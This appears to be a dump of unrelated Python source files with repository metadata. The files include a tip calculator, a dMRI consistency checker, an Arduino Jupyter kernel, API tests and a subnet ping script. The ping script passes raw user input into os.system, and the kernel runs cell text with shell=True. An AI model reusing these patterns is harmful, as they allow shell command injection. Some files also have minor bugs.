99e52f49796b5d41076aba34de619bcc405c5d52
155
py
Python
m06_file1.py
AmreshTripathy/Advance-Python
0cfe3fc263af1080edbf9167895a51d27be64993
[ "Apache-2.0" ]
null
null
null
m06_file1.py
AmreshTripathy/Advance-Python
0cfe3fc263af1080edbf9167895a51d27be64993
[ "Apache-2.0" ]
null
null
null
m06_file1.py
AmreshTripathy/Advance-Python
0cfe3fc263af1080edbf9167895a51d27be64993
[ "Apache-2.0" ]
null
null
null
def greet(name): print (f'Good morning, {name}') # print (__name__) if __name__ == '__main__': n = input('Enter Your name: ') greet(n)
19.375
36
0.574194
20
155
3.85
0.65
0.233766
0
0
0
0
0
0
0
0
0
0
0.258065
155
7
37
22.142857
0.669565
0.103226
0
0
0
0
0.346154
0
0
0
0
0
0
1
0.2
false
0
0
0
0.2
0.2
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
99e565c6c04330549af61e5e41e6e64599dd5a85
404
py
Python
Day 02 - Beginner - Understanding Data Types and How to Manipulate Strings/04_PROJECT_tip_calculator.py
not-lucky/100_Days_of_Code_-_The_Complete_Python_Pro_Bootcamp_for_2022
2c21c190ab756176bd7b577b3f8a0370b75c3828
[ "MIT" ]
null
null
null
Day 02 - Beginner - Understanding Data Types and How to Manipulate Strings/04_PROJECT_tip_calculator.py
not-lucky/100_Days_of_Code_-_The_Complete_Python_Pro_Bootcamp_for_2022
2c21c190ab756176bd7b577b3f8a0370b75c3828
[ "MIT" ]
null
null
null
Day 02 - Beginner - Understanding Data Types and How to Manipulate Strings/04_PROJECT_tip_calculator.py
not-lucky/100_Days_of_Code_-_The_Complete_Python_Pro_Bootcamp_for_2022
2c21c190ab756176bd7b577b3f8a0370b75c3828
[ "MIT" ]
null
null
null
print("wewcome to the tip cawcuwatow. >_<") bill = float(input("What is the total bill?\n$")) tip_percentage = float(input("What percentage tip will you like to give?\n")) split_among = int(input("How many people to split the bill?\n")) total_bill_with_tip = bill + (bill * tip_percentage / 100) each_pay = round(total_bill_with_tip / split_among, 2) print(f"Each person should pay: ${each_pay:.2f}")
36.727273
77
0.725248
68
404
4.117647
0.5
0.096429
0.1
0.114286
0
0
0
0
0
0
0
0.014327
0.136139
404
10
78
40.4
0.787966
0
0
0
0
0
0.443069
0
0
0
0
0
0
1
0
false
0
0
0
0
0.285714
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99ea05eb7467ddb1c7614fa510b122a7f9c67b31
4,619
py
Python
lib/consistencyCheck.py
pnlbwh/multi-shell-dMRIharmonization
46e207c5d2b7fd68ddbbd1b305c33cfd45351ee8
[ "CNRI-Python", "Info-ZIP" ]
4
2020-04-28T15:31:07.000Z
2022-02-15T07:04:21.000Z
lib/consistencyCheck.py
pnlbwh/multi-shell-dMRIharmonization
46e207c5d2b7fd68ddbbd1b305c33cfd45351ee8
[ "CNRI-Python", "Info-ZIP" ]
30
2019-11-10T20:51:34.000Z
2021-04-19T19:08:14.000Z
lib/consistencyCheck.py
pnlbwh/multi-shell-dMRIharmonization
46e207c5d2b7fd68ddbbd1b305c33cfd45351ee8
[ "CNRI-Python", "Info-ZIP" ]
3
2019-10-18T16:06:03.000Z
2021-02-21T01:10:45.000Z
#!/usr/bin/env python # =============================================================================== # dMRIharmonization (2018) pipeline is written by- # # TASHRIF BILLAH # Brigham and Women's Hospital/Harvard Medical School # tbillah@bwh.harvard.edu, tashrifbillah@gmail.com # # =============================================================================== # See details at https://github.com/pnlbwh/dMRIharmonization # Submit issues at https://github.com/pnlbwh/dMRIharmonization/issues # View LICENSE at https://github.com/pnlbwh/dMRIharmonization/blob/master/LICENSE # =============================================================================== from conversion import read_bvals, read_imgs, read_imgs_masks import numpy as np from warnings import warn from plumbum import local from util import abspath, load, isfile, getpid from findBshells import findBShells import sys def check_bshells(ref_imgs, ref_bvals): unmatched=[] for imgPath in ref_imgs: imgPath= local.path(imgPath) if not imgPath.exists(): FileNotFoundError(imgPath) inPrefix = abspath(imgPath).split('.nii')[0] bvals= findBShells(inPrefix+'.bval') if (bvals==ref_bvals).all(): print('b-shells matched for', imgPath.name) else: print(f'\nUnmatched b-shells for {imgPath.name}') print(bvals) print(f'ref_bvals {ref_bvals}\n') unmatched.append(imgPath._path) print('') if len(unmatched): print('Unmatched cases:') print(unmatched) raise ValueError('Leave out the unmatched cases or change the reference case for determining b-shell to run multi-shell-dMRIharmonization') else: print('All cases have same b-shells. Data is good for running multi-shell-dMRIharmonization') print('') def check_resolution(ref_imgs, ref_res): unmatched = [] for imgPath in ref_imgs: imgPath= local.path(imgPath) if not imgPath.exists(): FileNotFoundError(imgPath) res= load(imgPath._path).header['pixdim'][1:4] if (res-ref_res).sum()<=10e-6: print('spatial resolution matched for', imgPath.name) else: print(f'\nUnmatched spatial resolution for {imgPath.name}') print(res) print(f'ref_res {ref_res}\n') unmatched.append(imgPath._path) print('') if len(unmatched): print('Unmatched cases:') print(unmatched) raise ValueError('Leave out the unmatched cases or change the reference case for determining spatial resolution to run multi-shell-dMRIharmonization') else: print('All cases have same spatial resolution. Data is good for running multi-shell-dMRIharmonization') print('') def consistencyCheck(ref_csv, outputBshellFile= None, outPutResolutionFile= None): try: ref_imgs, _ = read_imgs_masks(ref_csv) except: ref_imgs = read_imgs(ref_csv) if isfile(outputBshellFile) and isfile(outPutResolutionFile): ref_bvals= read_bvals(outputBshellFile) ref_res = np.load(outPutResolutionFile) else: ref_bshell_img = ref_imgs[0] print(f'Using {ref_bshell_img} to determine b-shells') inPrefix = abspath(ref_bshell_img).split('.nii')[0] ref_bvals = findBShells(inPrefix + '.bval', outputBshellFile) ref_res = load(ref_bshell_img).header['pixdim'][1:4] np.save(outPutResolutionFile, ref_res) print('b-shells are', ref_bvals) print('\nSite', ref_csv, '\n') print('Checking consistency of b-shells among subjects') check_bshells(ref_imgs, ref_bvals) print('spatial resolution is', ref_res) print('Checking consistency of spatial resolution among subjects') check_resolution(ref_imgs, ref_res) if __name__ == '__main__': if len(sys.argv)==1 or sys.argv[1]=='-h' or sys.argv[1]=='--help': print('''Check consistency of b-shells and spatial resolution among subjects Usage: consistencyCheck list.csv/txt ref_bshell_bvalues.txt ref_res_file.npy Provide a csv/txt file with first column for dwi and 2nd column for mask: dwi1,mask1\\ndwi2,mask2\\n... or just one column for dwi1\\ndwi2\\n... In addition, provide ref_bshell_bvalues and ref_res_file.''') exit() ref_csv= abspath(sys.argv[1]) outputBshellFile= abspath(sys.argv[2]) outPutResolutionFile= abspath(sys.argv[3]) if isfile(ref_csv): consistencyCheck(ref_csv, outputBshellFile, outPutResolutionFile) else: raise FileNotFoundError(f'{ref_csv} does not exists.')
32.076389
158
0.646677
563
4,619
5.174068
0.296625
0.022657
0.013732
0.016478
0.354617
0.354617
0.276691
0.276691
0.248541
0.248541
0
0.007311
0.200476
4,619
143
159
32.300699
0.781478
0.136826
0
0.311111
0
0.033333
0.31412
0.042034
0
0
0
0
0
1
0.033333
false
0
0.077778
0
0.111111
0.277778
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99ebaf6f0294d590f15abaa22804c5ca352ff36f
1,283
py
Python
tests/test_cross_corr.py
halomod/halomod
f4f207ac70ed32a7f7e16139698c85eda1f0b6a9
[ "MIT" ]
4
2021-02-23T13:28:59.000Z
2022-02-11T15:53:57.000Z
tests/test_cross_corr.py
halomod/halomod
f4f207ac70ed32a7f7e16139698c85eda1f0b6a9
[ "MIT" ]
20
2021-02-02T15:08:28.000Z
2021-09-20T18:26:49.000Z
tests/test_cross_corr.py
halomod/halomod
f4f207ac70ed32a7f7e16139698c85eda1f0b6a9
[ "MIT" ]
3
2021-03-07T15:28:34.000Z
2021-08-21T21:41:44.000Z
import numpy as np from halomod.cross_correlations import ConstantCorr, CrossCorrelations def test_cross_same(): """Test if using two components that are the same gives the same as an auto corr.""" cross = CrossCorrelations( cross_hod_model=ConstantCorr, halo_model_1_params={ "exclusion_model": "NoExclusion", "sd_bias_model": None, "transfer_model": "EH", "force_1halo_turnover": False, }, halo_model_2_params={ "exclusion_model": "NoExclusion", "sd_bias_model": None, "transfer_model": "EH", "force_1halo_turnover": False, }, ) assert np.allclose(cross.power_2h_cross, cross.halo_model_1.power_2h_auto_tracer) assert np.allclose(cross.corr_2h_cross, cross.halo_model_1.corr_2h_auto_tracer) # This is only close-ish, because cross-pairs are actually different than auto-pairs, # since you can count self-correlations. assert np.allclose( cross.corr_1h_cross, cross.halo_model_1.corr_1h_auto_tracer, atol=1e-5, rtol=1e-1, ) assert np.allclose( cross.power_1h_cross, cross.halo_model_1.power_1h_auto_tracer, atol=1e-6, rtol=1e-1, )
29.837209
89
0.643804
165
1,283
4.69697
0.406061
0.069677
0.064516
0.108387
0.531613
0.353548
0.216774
0.216774
0.216774
0.216774
0
0.025478
0.265783
1,283
42
90
30.547619
0.79724
0.157443
0
0.375
0
0
0.139665
0
0
0
0
0
0.125
1
0.03125
false
0
0.0625
0
0.09375
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99ed550f29778c36dd9474368aebbf80d7e96b69
7,570
py
Python
apps/graphs/bandwidth_performance_graph.py
cucl-srg/Measuring-Burstiness
b9024bf606362d5587773a0c5b892fcb97a3d577
[ "Apache-2.0" ]
1
2022-03-21T02:26:27.000Z
2022-03-21T02:26:27.000Z
apps/graphs/bandwidth_performance_graph.py
cucl-srg/Measuring-Burstiness
b9024bf606362d5587773a0c5b892fcb97a3d577
[ "Apache-2.0" ]
null
null
null
apps/graphs/bandwidth_performance_graph.py
cucl-srg/Measuring-Burstiness
b9024bf606362d5587773a0c5b892fcb97a3d577
[ "Apache-2.0" ]
1
2020-08-10T16:46:05.000Z
2020-08-10T16:46:05.000Z
import argparse import matplotlib import scipy.stats matplotlib.use("Agg") import sys import matplotlib.pyplot as plt import numpy as np import os sys.path.insert(0, '/root/jcw78/process_pcap_traces/') import graph_utils graph_utils.latexify(space_below_graph=0.4) def tensorflow(folder, name_map): # In tensorflow, the performance data is in all the slaves. # It is identical in every one, so just take an arb one. machine = name_map['slave'][0] data_file = folder + os.path.sep + machine + os.path.sep + \ 'data' + os.path.sep + 'tensorflow-mnist' with open(data_file, 'r') as f: for line in f.readlines(): if line.startswith("Training elapsed time"): # The benchmark runs for 20000 steps, so get the # time per step. performance = 20000.0 / float(line.split(' ')[3]) return [performance] print "Error: no performance numbers found!" def apache(folder, name_map): # All the slaves have performance numbers here. performance_numbers = [] for machine in name_map['client']: data_file = folder + os.path.sep + machine + os.path.sep + \ 'data' + os.path.sep + 'apache_ab_out' with open(data_file, 'r') as f: for line in f.readlines(): if line.startswith('Requests per second:'): rate = float([x for x in line.split(' ') if x][3]) performance_numbers.append(rate) return performance_numbers def memcached(folder, name_map): # All the slaves have different performance numbers here. performance = [] for machine in name_map['client']: data_file = folder + os.path.sep + machine + os.path.sep + \ 'data' + os.path.sep + 'memcached_mutilate_stdout' with open(data_file, 'r') as f: for line in f.readlines(): if line.startswith('Total QPS'): rate = float(line.split(' ')[3]) performance.append(rate) return performance def dns(folder, name_map): # All the slaes have different performance numbers here. performance = [] for slave in name_map['client']: data_file = folder + os.path.sep + slave + os.path.sep + \ 'data' + os.path.sep + 'dns-out' with open(data_file, 'r') as f: for line in f.readlines(): if 'Queries per second:' in line: rate = float([x for x in line.split(' ') if x][3]) performance.append(rate) return performance def get_performance(benchmark_name, benchmark_folder): # First, from the machine roles file get the server and # the client folders. role_to_name_map = {} with open(benchmark_folder + os.path.sep + 'MachineRoles', 'r') as f: lines = f.readlines() for line in lines: if benchmark_name + '-' in line: _, role = line.strip().split('-') management_ip = line.split(' ')[0].strip() # Now get the jname of the machien for that # IP. for line in lines: if management_ip in line: name = line.split(' ')[3].strip() break if role in role_to_name_map: role_to_name_map[role].append(name) else: role_to_name_map[role] = [name] # How the performance is handled depends on the # benchmark. if benchmark_name == 'tensorflow': return tensorflow(benchmark_folder, role_to_name_map) elif benchmark_name == 'dns': return dns(benchmark_folder, role_to_name_map) elif benchmark_name == 'memcached': return memcached(benchmark_folder, role_to_name_map) elif benchmark_name == 'apache': return apache(benchmark_folder, role_to_name_map) else: print "I don't know how to extract performance numbers from", print benchmark_name if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('results_folders', nargs='+') parser.add_argument('--num-machines', default='7', dest='num_machines') args = parser.parse_args() # First, get all the individual runs out of a folder. benchmark_folders = [] for folder in args.results_folders: folders = [folder + os.path.sep + x for x in os.listdir(folder)] benchmark_folders += folders # Now, get the benchmarks that we ran. # Also get the rates. benchmarks = [] rates = {} folders_by_benchmark_rate = {} for folder in benchmark_folders: name, rate, _ = os.path.basename(folder).split('_') rate = int(rate) if name not in benchmarks: benchmarks.append(name) if name in rates: rates[name].append(rate) else: rates[name] = [rate] folders_by_benchmark_rate[name + str(rate)] = folder plt.clf() # Construct a line for every benchmark. for benchmark in benchmarks: errors_below = [] errors_above = [] app_performances = [] values = [] plotted_rates = [] for rate in sorted(rates[benchmark]): folder_name = folders_by_benchmark_rate[benchmark + str(rate)] # Get all the benchmark runs: run_parent_folder = folder_name + os.path.sep + args.num_machines + '_machines' + os.path.sep + 'run' run_folders = os.listdir(run_parent_folder) # How each run is parsed depends on the type # of benchmark. Parse that. performance = [] for run_folder in run_folders: if not os.path.exists(run_parent_folder + os.path.sep + run_folder + os.path.sep + 'FAILED_WITH_TIMEOUT'): performance+=get_performance(benchmark, run_parent_folder + os.path.sep + run_folder) print benchmark print len(performance) if len(performance) > 0: app_performances.append(performance) plotted_rates.append(rate) else: print "No performance numbers found for ", run_parent_folder # We normalize with respect to the highest available # bandwidth. highest_median = None for performance in app_performances: if highest_median: highest_median = \ max(np.median(performance), highest_median) else: highest_median = np.median(performance) for i in range(len(app_performances)): app_performances[i] = np.array(app_performances[i]) / highest_median for performance in app_performances: value = np.median(performance) values.append(value) low_percentile, high_percentile = np.percentile(performance, [25, 75]) errors_below.append(value - low_percentile) errors_above.append(high_percentile - value) print benchmark print plotted_rates plt.errorbar(plotted_rates, values, yerr=(errors_below, errors_above), label=benchmark, capsize=5) plt.ylabel('Normalized Performance') plt.xlabel('Bandwidth Limit (Mbps)') graph_utils.set_legend_below(ncol=4) graph_utils.set_ticks() graph_utils.set_non_negative_axes() plt.xlim([0, 10000]) filename = 'bandwidth_vs_performance.eps' plt.savefig(filename) print "Done! File saved in: ", filename
35.707547
122
0.604359
926
7,570
4.769978
0.235421
0.028526
0.038714
0.030564
0.264433
0.228209
0.22187
0.166855
0.151913
0.121349
0
0.006975
0.299207
7,570
211
123
35.876777
0.825636
0.107662
0
0.217105
0
0
0.082294
0.012626
0
0
0
0
0
0
null
null
0
0.052632
null
null
0.059211
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
99edf83c304fa89bec4ed4d3b21dd4548b013c50
1,368
py
Python
bot/utils/errors.py
Clutter-Development/Clutter
6b725c016a439958caaa7d88bacae8e2b11ca272
[ "CC0-1.0" ]
6
2022-02-04T17:11:19.000Z
2022-03-05T09:14:39.000Z
bot/utils/errors.py
Clutter-Development/Clutter
6b725c016a439958caaa7d88bacae8e2b11ca272
[ "CC0-1.0" ]
2
2022-02-08T16:53:42.000Z
2022-02-19T07:44:19.000Z
bot/utils/errors.py
Clutter-Development/Clutter
6b725c016a439958caaa7d88bacae8e2b11ca272
[ "CC0-1.0" ]
2
2022-02-18T21:28:57.000Z
2022-02-23T17:08:18.000Z
import discord from discord import app_commands as app __all__ = ( "ClutterError", "InDevelopmentMode", "UserIsBlacklisted", "GuildIsBlacklisted", "UserHasBeenBlacklisted", "GlobalCooldownReached", "UnknownTranslationString", ) class ClutterError(discord.DiscordException): """Base class for all Clutter errors.""" class InDevelopmentMode(ClutterError, app.AppCommandError): """Raised when a user is not a bot admin and bot is in development mode when using an app command.""" class UserIsBlacklisted(ClutterError, app.AppCommandError): """Raised when a user is blacklisted when using an app command.""" class GuildIsBlacklisted(ClutterError, app.AppCommandError): """Raised when a guild is blacklisted when using an app command.""" class UserHasBeenBlacklisted(ClutterError, app.AppCommandError): """Raised when a user is blacklisted when using an app command.""" class GlobalCooldownReached(ClutterError, app.AppCommandError): """Raised when a user is blacklisted when using an app command.""" def __init__(self, retry_after: float, message: str, /): self.retry_after = retry_after self.message = message def __str__(self): return self.message class UnknownTranslationString(ClutterError, app.AppCommandError): """Raised when a translation string is missing"""
28.5
105
0.736111
150
1,368
6.606667
0.333333
0.090817
0.181635
0.217962
0.445005
0.445005
0.336024
0.336024
0.249243
0.249243
0
0
0.173977
1,368
47
106
29.106383
0.876991
0.306287
0
0
0
0
0.143483
0.073384
0
0
0
0
0
1
0.086957
false
0
0.086957
0.043478
0.521739
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
3
99ef4c4300edcee0f21908e1a69183d6ec7a6f37
44
py
Python
seq2seq/seq2seq/loss/__init__.py
qbetterk/user-simulator
77caca30ff67b9112b1fe5e65e191c6b5e25532c
[ "Apache-2.0" ]
20
2019-11-08T02:28:28.000Z
2022-02-07T09:20:21.000Z
seq2seq/seq2seq/loss/__init__.py
qbetterk/user-simulator
77caca30ff67b9112b1fe5e65e191c6b5e25532c
[ "Apache-2.0" ]
21
2019-11-08T02:27:40.000Z
2022-03-12T00:02:54.000Z
seq2seq/seq2seq/loss/__init__.py
qbetterk/user-simulator
77caca30ff67b9112b1fe5e65e191c6b5e25532c
[ "Apache-2.0" ]
8
2020-02-10T07:28:37.000Z
2021-09-23T09:42:14.000Z
from .loss import Loss, NLLLoss, Perplexity
22
43
0.795455
6
44
5.833333
0.833333
0
0
0
0
0
0
0
0
0
0
0
0.136364
44
1
44
44
0.921053
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
99efb291ee7023242cf3315eacce5ac12e340e87
5,703
py
Python
arduino_kernel/kernel.py
jpsaenzmo/jupyter-lab-kernelino
57b20c9cecf74d6533243729f47ab9cc74e0ef7d
[ "BSD-3-Clause" ]
null
null
null
arduino_kernel/kernel.py
jpsaenzmo/jupyter-lab-kernelino
57b20c9cecf74d6533243729f47ab9cc74e0ef7d
[ "BSD-3-Clause" ]
null
null
null
arduino_kernel/kernel.py
jpsaenzmo/jupyter-lab-kernelino
57b20c9cecf74d6533243729f47ab9cc74e0ef7d
[ "BSD-3-Clause" ]
null
null
null
from ipykernel.kernelbase import Kernel import json import os import subprocess import sys import urllib from urllib.request import urlopen from requests.compat import urljoin from notebook.notebookapp import list_running_servers from .board import Board, BoardError SKETCH_FOLDER = ".arduino/sketch" class ArduinoKernel(Kernel): implementation = "Arduino" implementation_version = "1.0" language = "no-op" language_version = "0.1" language_info = { "name": "Any text", "mimetype": "text/plain", "file_extension": ".ino", } banner = "Arduino kernel" def __init__(self, **kwargs): Kernel.__init__(self, **kwargs) self._start_bash() def _start_bash(self): from pexpect import replwrap import signal sig = signal.signal(signal.SIGINT, signal.SIG_DFL) try: os.makedirs(SKETCH_FOLDER) except FileExistsError: pass def do_execute( self, code, silent, store_history=True, user_expressions=None, allow_stdin=False ): from pexpect import EOF # Empty cell if not code.strip(): return { "status": "OK", "execution_count": self.execution_count, "payload": [], "user_expressions": {}, } # Non-empty cell interrupted = False try: try: os.makedirs(SKETCH_FOLDER) except FileExistsError: pass if code == "arduino-cli board list": try: sp = subprocess.check_output( "arduino-cli board list", stderr=subprocess.STDOUT, shell=False ) except subprocess.CalledProcessError as e: raise RuntimeError( "command '{}' return with error (code {}): {}".format( e.cmd, e.returncode, e.output ) ) output = sp.decode(sys.stdout.encoding) elif code.startswith("arduino-cli lib install"): try: sp = subprocess.check_output( code, stderr=subprocess.STDOUT, shell=True, ) except subprocess.CalledProcessError as e: errorTxt = "Command '{}' return with error (code {}): {}".format( e.cmd, e.returncode, e.output ) stream_content = {"name": "stdout", "text": errorTxt} self.send_response(self.iopub_socket, "stream", stream_content) return {"status": "abort", "execution_count": self.execution_count} output = sp.decode(sys.stdout.encoding) else: oper = code.split("\n")[0] command = "" codes = "" if oper.split("%")[0] == "port": port = oper.split("%")[1] fqbn = code.split("\n")[1] fqbn = fqbn.split("%")[1] codes = code.split("\n", 2)[2] command = ( "arduino-cli upload -p " + port + " --fqbn " + fqbn + " " + SKETCH_FOLDER ) elif oper.split("%")[0] == "board": fqbn = code.split("\n")[0] fqbn = fqbn.split("%")[1] codes = code.split("\n", 1)[1] command = "arduino-cli compile -b " + fqbn + " " + SKETCH_FOLDER f = open(SKETCH_FOLDER + "/sketch.ino", "w+") f.write(codes.rstrip()) f.close() try: sp = subprocess.check_output( command, stderr=subprocess.STDOUT, shell=True, ) except subprocess.CalledProcessError as e: errorTxt = "Command '{}' return with error (code {}): {}".format( e.cmd, e.returncode, e.output ) stream_content = {"name": "stdout", "text": errorTxt} self.send_response(self.iopub_socket, "stream", stream_content) return {"status": "abort", "execution_count": self.execution_count} output = sp.decode(sys.stdout.encoding) except KeyboardInterrupt: interrupted = True clean_sketches() # Restarting Bash except EOF: output = self.bash_wrapper.child.before + "Restarting Bash" # If expecting output if not silent: stream_content = {"name": "stdout", "text": output} self.send_response(self.iopub_socket, "stream", stream_content) # If interrupted if interrupted: clean_sketches() return {"status": "abort", "execution_count": self.execution_count} # If everything is OK else: return { "status": "ok", "execution_count": self.execution_count, "payload": [], "user_expressions": {}, } def clean_sketches(): if os.path.isfile("./" + SKETCH_FOLDER + "/sketch.ino"): filelist = os.listdir("./" + SKETCH_FOLDER) for f in filelist: os.remove(os.path.join(mydir, f))
35.867925
88
0.476065
505
5,703
5.253465
0.310891
0.05277
0.033924
0.050886
0.456087
0.402563
0.390878
0.390878
0.312853
0.294007
0
0.004815
0.417324
5,703
158
89
36.094937
0.79356
0.016833
0
0.374101
0
0
0.115357
0
0
0
0
0
0
1
0.028777
false
0.014388
0.093525
0
0.208633
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99f29d7b80d7894462f8ed96f68faef9669e0b6b
3,022
py
Python
baidu_code/bcoreapi/info/schedule.py
deevarvar/myLab
7a5019f5f7fc11e173d350e6e2a7d2c80504782d
[ "MIT" ]
null
null
null
baidu_code/bcoreapi/info/schedule.py
deevarvar/myLab
7a5019f5f7fc11e173d350e6e2a7d2c80504782d
[ "MIT" ]
null
null
null
baidu_code/bcoreapi/info/schedule.py
deevarvar/myLab
7a5019f5f7fc11e173d350e6e2a7d2c80504782d
[ "MIT" ]
3
2016-10-08T15:01:49.000Z
2018-05-24T03:14:24.000Z
#-*- coding=utf-8 -*- ''' @description: 影讯新接口——排期接口测试用例。 @author: miliang<miliang@baidu.com> ''' from base import Info_Base class Info_Schedule(Info_Base): def __init__(self,cinema_id=None,encode_bid=None,bid=None): super(Info_Schedule,self).__init__() self.req_url = self.req_url + 'schedule' self.req_dict = {} if cinema_id: self.req_dict['cinema_id'] = cinema_id self.cinema_id = cinema_id if encode_bid: self.req_dict['encode_id'] = encode_id self.encode_id = encode_id if bid: self.req_dict['bid'] = bid self.bid = bid def doAssert(self): print self.page_dict assert self.page_dict['errorMsg'] == 'Success' assert self.page_dict['movie_id'] assert self.page_dict['time_table'] partner = '' for date in self.page_dict['time_table']: for schedule in self.page_dict['time_table'][date]: #上一个合作方的竞争价,要求按竞争价升序排列(下线了) #former_com_price = 0 assert schedule['time'] assert schedule['date'] assert schedule['movie_id'] assert schedule['end_time'] assert schedule.has_key('src_info') for i in range(len(schedule['src_info'])): assert schedule['src_info'][i]['src'] # 5.11:仅返回C端同一合作方的影讯 if partner == '': partner = schedule['src_info'][i]['src'] else : assert schedule['src_info'][i]['src'] == partner assert schedule['src_info'][i].has_key('lan') # 这个暂时可能为空 assert schedule['src_info'][i].has_key('type') # 这个暂时可能为空 assert schedule['src_info'][i]['origin_price'] assert schedule['src_info'][i]['price'] assert schedule['src_info'][i].has_key('seq_no') # 这个暂时可能为空 assert schedule['src_info'][i]['third_cinema_id'] assert schedule['src_info'][i]['third_movie_id'] assert schedule['src_info'][i]['theater'] assert schedule['src_info'][i]['src_name'] assert schedule['src_info'][i]['out_buy_time'] assert schedule['src_info'][i].has_key('hall_id') # 这个暂时可能为空 assert schedule['src_info'][i].has_key('weight') assert schedule['src_info'][i].has_key('status') and schedule['src_info'][i]['status'] == 0 or schedule['src_info'][i]['status'] == 1 #assert schedule['src_info'][i].has_key('com_price') and schedule['src_info'][i]['com_price'] >= former_com_price #former_com_price = schedule['src_info'][i]['com_price'] if __name__ == '__main__': case = Info_Schedule(cinema_id=8350) case.execute()
43.171429
154
0.531105
348
3,022
4.324713
0.232759
0.106977
0.219269
0.223256
0.445847
0.352824
0.140864
0.047841
0
0
0
0.005456
0.332892
3,022
69
155
43.797101
0.740079
0.095301
0
0
0
0
0.155039
0
0
0
0
0
0.48
0
null
null
0
0.02
null
null
0.02
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
1
0
0
0
0
0
0
0
0
4
99f2a8cd466b198120000a799808ca4ceb565c8a
465
py
Python
ping.py
TuxStory/Python3
4c1b2291d1613b32aa36b62b0b881ea40b423cce
[ "MIT" ]
null
null
null
ping.py
TuxStory/Python3
4c1b2291d1613b32aa36b62b0b881ea40b423cce
[ "MIT" ]
null
null
null
ping.py
TuxStory/Python3
4c1b2291d1613b32aa36b62b0b881ea40b423cce
[ "MIT" ]
null
null
null
import os def ping(plage): for ip in range(255): test = os.system("ping -c 1 " +plage+str(ip)+" >/dev/null") if test == 0: print(plage+str(ip),"est actif sur le reseau.") def main(): os.system("clear") print("PingPy".center(25,"-")) print("\nExemple : 192.168.1.") print("Exemple : 192.168.0.") print("-"*25) Plage = input("Adresses reseau a scanner: ") ping(Plage) if __name__=="__main__": main()
23.25
67
0.556989
66
465
3.80303
0.590909
0.071713
0.079681
0
0
0
0
0
0
0
0
0.065527
0.245161
465
19
68
24.473684
0.649573
0
0
0
0
0
0.290323
0
0
0
0
0
0
1
0.125
false
0
0.0625
0
0.1875
0.3125
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99f3591924ec7be6b6dc2dbe39d731a3c039c201
971
py
Python
MathUtilities.py
paulmontecot/PythonDFTMotionP3
741e544e0885e97a5469649ae2a90eadbec914c5
[ "MIT" ]
null
null
null
MathUtilities.py
paulmontecot/PythonDFTMotionP3
741e544e0885e97a5469649ae2a90eadbec914c5
[ "MIT" ]
null
null
null
MathUtilities.py
paulmontecot/PythonDFTMotionP3
741e544e0885e97a5469649ae2a90eadbec914c5
[ "MIT" ]
null
null
null
import numpy as np import pandas as pd def integral(df,data): integral = [0] for i in range(len(df.index) - 1): dt_ = df.time[i + 1] - df.time[i] integral_ = data[i] * dt_ integral_ += (data[i + 1] - data[i]) * dt_ / 2.0 integral.append(integral[i] + integral_) return(integral) def derivData(df,data): derivData = [0] for i in range(len(df.index) - 1): if i == 0: derivData.append((data[i + 1] - data[i]) / (df.time[i + 1] - df.time[i])) elif i == len(df.index) - 1: derivData.append((data[i] - data[i - 1]) / (df.time[i] - df.time[i - 1])) else: derivData.append((data[i + 1] - data[i - 1]) / (df.time[i + 1] - df.time[i - 1])) return(derivData) def angle(df,X,Z): angle = [0] angle = np.arctan(X/Z) return(angle) def norme(df): norme = np.sqrt(((df['accX'])**2)+(df['accY']**2)+(df['accZ']**2)) return(norme)
27.742857
93
0.510814
151
971
3.245033
0.238411
0.040816
0.114286
0.081633
0.361224
0.322449
0.291837
0.093878
0.093878
0
0
0.031838
0.288363
971
34
94
28.558824
0.677279
0
0
0.074074
0
0
0.012384
0
0
0
0
0
0
1
0.148148
false
0
0.074074
0
0.222222
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99f3fc94d7ce6e669de010cfe49cc2e8d70b8888
3,461
py
Python
attention.py
lil-lab/atis
08a17a7be8cd7b40d2f35e089947df4d543b3321
[ "MIT" ]
21
2019-06-03T14:21:00.000Z
2022-01-14T13:43:42.000Z
attention.py
clic-lab/atis
08a17a7be8cd7b40d2f35e089947df4d543b3321
[ "MIT" ]
3
2018-07-05T13:42:31.000Z
2019-04-02T12:01:18.000Z
attention.py
clic-lab/atis
08a17a7be8cd7b40d2f35e089947df4d543b3321
[ "MIT" ]
12
2018-06-13T00:11:33.000Z
2019-04-15T22:12:08.000Z
